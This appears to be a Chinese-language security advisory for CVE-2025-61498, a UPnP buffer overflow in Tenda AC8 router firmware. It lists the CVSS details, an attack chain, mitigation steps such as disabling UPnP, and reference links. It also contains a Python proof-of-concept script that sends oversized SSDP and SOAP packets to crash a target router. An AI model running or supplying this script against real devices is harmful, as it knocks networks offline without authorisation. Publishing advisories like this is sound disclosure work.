CVE-2025-61498: Tenda AC8 UPnP服务缓冲区溢出漏洞导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-61498

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC8 Hardware v03.03.10.01

漏洞概述

CVE-2025-61498是Tenda AC8路由器固件版本v03.03.10.01中发现的缓冲区溢出安全漏洞。该漏洞存在于路由器的通用即插即用（UPnP）服务中，攻击者可以通过网络向目标设备发送精心构造的恶意数据包来触发此漏洞。UPnP服务通常用于自动发现和配置网络设备，虽然为用户提供了便利性，但也带来了严重的安全风险。攻击者无需任何认证凭证，也不需要用户交互，即可远程利用此漏洞。当攻击者发送的超长或格式错误的字符串被UPnP服务处理时，会导致堆栈或堆内存缓冲区溢出，覆盖相邻内存区域，最终造成服务崩溃或未定义行为。这种缓冲区溢出可能导致路由器重启、服务中断或执行任意代码，从而造成拒绝服务（DoS）状态。对于家庭用户和企业网络而言，该漏洞可能造成网络连接中断，影响正常的网络通信和业务连续性。

技术细节

该缓冲区溢出漏洞位于Tenda AC8路由器的UPnP服务组件中，具体发生在处理SSDP（简单服务发现协议）请求或SOAP控制消息的环节。UPnP协议栈在解析来自网络的数据包时，缺乏适当的边界检查和输入验证。当接收到包含超长字符串字段（如设备名称、URL或其他SSDP/SOAP参数）的请求时，代码将数据复制到固定大小的缓冲区中，而未检查源数据长度是否超过目标缓冲区容量。这种经典的缓冲区溢出条件允许攻击者覆盖堆栈帧中的返回地址、函数指针或其他关键数据结构。在某些情况下，攻击者可能通过ROP（返回导向编程）技术绕过DEP（数据执行保护）并实现代码执行。对于本漏洞（CVSS 7.5），主要影响为可用性破坏，表现为目标服务完全崩溃或设备无响应。攻击者只需构造包含超长字段（如超过256字节的字符串）的SSDP M-SEARCH请求或SOAP请求，并将其发送至路由器的UPnP监听端口（通常为1900/UDP或5000/TCP）即可触发漏洞。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标Tenda AC8路由器，获取其IP地址，并确认UPnP服务处于启用状态

STEP 2

2

构造攻击载荷：攻击者创建包含超长字符串字段（500-1000字节）的恶意UPnP数据包，可以是SSDP M-SEARCH请求或SOAP控制消息

STEP 3

3

发送恶意数据包：通过网络将精心构造的数据包发送至路由器的UPnP监听端口（UDP 1900或TCP 5000），无需任何认证

STEP 4

4

触发缓冲区溢出：UPnP服务在处理超长字符串时未进行边界检查，导致缓冲区溢出，覆盖堆栈中的返回地址和关键数据结构

STEP 5

5

造成拒绝服务：溢出导致服务崩溃、路由器重启或进入不可用状态，网络连接中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

# CVE-2025-61498 PoC - Tenda AC8 UPnP Buffer Overflow
# Target: Tenda AC8 Router UPnP Service
# Impact: Denial of Service

def send_malicious_upnp_packet(target_ip, target_port=1900):
    """
    Send a crafted SSDP M-SEARCH packet with oversized fields
    to trigger buffer overflow in UPnP service
    """
    # Generate oversized string to trigger buffer overflow
    overflow_string = 'A' * 500
    
    # Craft SSDP M-SEARCH request with overflow payload
    packet = f'M-SEARCH * HTTP/1.1\r\n'
    packet += f'HOST: {target_ip}:{target_port}\r\n'
    packet += f'ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n'
    packet += f'MAN: "ssdp:discover"\r\n'
    packet += f'MX: 3\r\n'
    packet += f'USER-AGENT: {overflow_string}\r\n\r\n'
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        sock.sendto(packet.encode(), (target_ip, target_port))
        print(f'[+] Malicious packet sent to {target_ip}:{target_port}')
        print(f'[+] Overflow string length: {len(overflow_string)} bytes')
        sock.close()
        return True
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

def send_soap_overflow(target_ip, port=5000):
    """
    Alternative: Send oversized SOAP request to UPnP control endpoint
    """
    overflow_data = 'X' * 1000
    
    soap_packet = f'POST /control/wan HTTP/1.1\r\n'
    soap_packet += f'Host: {target_ip}:{port}\r\n'
    soap_packet += f'SOAPACTION: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"\r\n'
    soap_packet += f'Content-Type: text/xml\r\n'
    soap_packet += f'Content-Length: {len(overflow_data)}\r\n\r\n'
    soap_packet += f'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    soap_packet += f'<s:Body>{overflow_data}</s:Body></s:Envelope>'
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, port))
        sock.send(soap_packet.encode())
        print(f'[+] SOAP overflow packet sent to {target_ip}:{port}')
        sock.close()
        return True
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-61498-poc.py <target_ip>')
        sys.exit(1)
    
    target = sys.argv[1]
    print(f'[*] Targeting Tenda AC8 Router: {target}')
    print(f'[*] CVE-2025-61498 - UPnP Buffer Overflow PoC')
    
    # Method 1: SSDP overflow
    send_malicious_upnp_packet(target)
    
    # Method 2: SOAP overflow
    send_soap_overflow(target)

影响范围

Tenda AC8 Hardware v03.03.10.01

防御指南

临时缓解措施

在官方补丁发布之前，建议立即禁用Tenda AC8路由器上的UPnP功能，通过Web管理界面访问路由器设置，导航至高级设置或转发规则页面，关闭UPnP开关。同时，建议在边界防火墙上屏蔽流入的UPnP流量（UDP端口1900和TCP端口5000），仅允许必要的出站UPnP通信。此外，可考虑使用VPN连接访问内网设备，减少直接暴露在互联网的攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61498
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61498
3 Details https://www.cvedetails.com/cve/CVE-2025-61498/
4 VulDB https://vuldb.com/cve/CVE-2025-61498
5 Link http://tenda.com
6 Link https://github.com/sakshi-garg02/CVEs/tree/main/CVE-2025-61498